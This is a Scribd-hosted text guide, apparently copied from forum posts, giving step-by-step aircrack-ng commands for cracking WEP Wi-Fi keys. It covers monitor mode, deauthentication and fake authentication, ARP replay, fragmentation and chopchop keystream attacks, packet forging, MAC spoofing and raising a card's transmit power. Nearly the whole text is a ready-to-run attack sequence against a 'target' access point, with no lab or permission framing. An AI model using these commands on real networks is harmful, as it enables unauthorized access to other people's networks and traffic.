Scribd Logo
Carica

Benvenuto in Scribd!

  • Aircrack NG Guide

    Caricato da

    Diana Douglas
    25 visualizzazioni3 pagine
    This is simplify guide for AirCrack-NG

    Copyright

    © © All Rights Reserved

    Formati disponibili

    TXT, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    This is simplify guide for AirCrack-NG

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    25 visualizzazioni3 pagine

    Aircrack NG Guide

    Caricato da

    Diana Douglas
    This is simplify guide for AirCrack-NG

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 3

    airmon-ng start wlan0

    airodump-ng -c "channel" --bssid "AP MAC" -w output wlan0


    aireplay-ng -3 -b "AP MAC" wlan0
    aireplay-ng -1 0 -e "AP NAME" -a "AP MAC" wlan0
    aireplay-ng -0 10 -a "AP MAC" -c "CL MAC" wlan0
    aircrack-ng -s -b "AP MAC" output*.cap
    EDIT: First enable high power on your awus036h to make it inject over even great
    er distances: (using r8187 driver)
    modprobe -r rtl8187
    modprobe r8187
    iwpriv wlan0 highpower 1
    iwconfig wlan0 txpower 27
    Now bring it up in monitor mode and follow the steps below.
    1 - Start airodump on the correct channel/bssid:
    airodump-ng -c CHANNELAP --bssid BSSIDAP -w dlink wlan0
    2 - Try the fragmentation attack first, and if succesfull; it will always give y
    ou a 1500 bytes XOR file: ( you might have to try a few different packets before
    it will work )
    aireplay-ng -5 -b BSSIDAP -r dlink-01.cap wlan0
    3 - If fragmentation doesn't work, try chopchop instead, but keep this in mind:
    If you use a XOR file obtained from a chopchop attack, be sure it is at least 14
    4 bytes long! Which means you should select a packet from the AP to chopchop tha
    t's at least 144 bytes, so it will result in a 144 bytes XOR file: (keystream)
    aireplay-ng -4 -b BSSIDAP -r dlink-01.cap wlan0
    4 - Once you get a valid XOR file, from either chopchop or fragmentation, and it
    's equal or bigger than 144 bytes, you can use it for fake Shared Key Authentica
    tion:
    aireplay-ng -1 0 -a BSSIDAP -y NAMEOFXORFILE.xor wlan0
    5 - If authentication is succesfull, it's time to forge an ARP packet:
    packetforge-ng -0 -a BSSIDAP -h YOURCARDSMAC -k 255.255.255.255 -l 255.255.255.2
    55 -y NAMEOFXORFILE.xor -w arp
    6 - Inject your forged ARP packet:
    aireplay-ng -3 -b BSSIDAP -r arp wlan0
    7 - IV/data rate goes up in airodump, so you can now crack the key with aircrack
    :
    aircrack-ng dlink*.cap
    00:1E:58:9B:37:7c
    NOTES
    These are all different colors because they coordinate with parts of the code yo
    u will have to change when typing them.
    wlan0 = Interface (Examples: wlan0, ath0, eth0)
    ch = The channel the target is on (Examples: 6, 11)
    bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
    ssid = Name of target (Examples: linksys, default)
    filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
    fragment-*.xor= The * being replaced by a number
    (Examples: fragment-25313-0123.xor)
    PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
    Ignore :
    -------------------------------------------------------------------------
    WEP CRACK GUIDE
    1. Boot computer with Backtrack 4 (login: root , pass: toor / poweroff at end)
    2. Open Konsole and type the following:
    3. airmon-ng (You will find your Interface here)
    4. airmon-ng stop wlan0 **My interface is wlan0. It may be yours also. Replace a
    ll the wlan0 with your own interface!**
    5. ifconfig wlan0 down
    6. macchanger --mac 00:11:22:33:44:55 wlan0
    7. airmon-ng start wlan0
    8. airodump-ng wlan0
    9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
    10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
    11. Open new Konsole and type the following:
    12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
    13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
    14. Open new Konsole and type the following:
    15. aircrack-ng -b (bssid) (file name)-01.cap
    -------------------------------------------------------------------------
    ALTERNATE ATTACKS
    FRAGMENTATION
    1. After step 11 in the WEP CRACK GUIDE, type the following:
    2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan
    0
    3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
    4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.2
    55.255.255 -y fragment-*.xor -w arp-packet
    5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
    6. aireplay-ng -2 -r arp-packet wlan0
    7. aircrack-ng -b (bssid) (file name)-01.cap
    CHOPCHOP
    1. After step 11 in the WEP CRACK GUIDE, type the following:
    2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan
    0
    3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
    4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
    **Be sure to open new Konsoles when necessary**
    http://forum.aircrack-ng.org/index.php?topic=7430.0
    http://www.enigmagroup.org/articles/view/WiFi%20Hacking/2-How-to-crack-WEP

    Potrebbero piacerti anche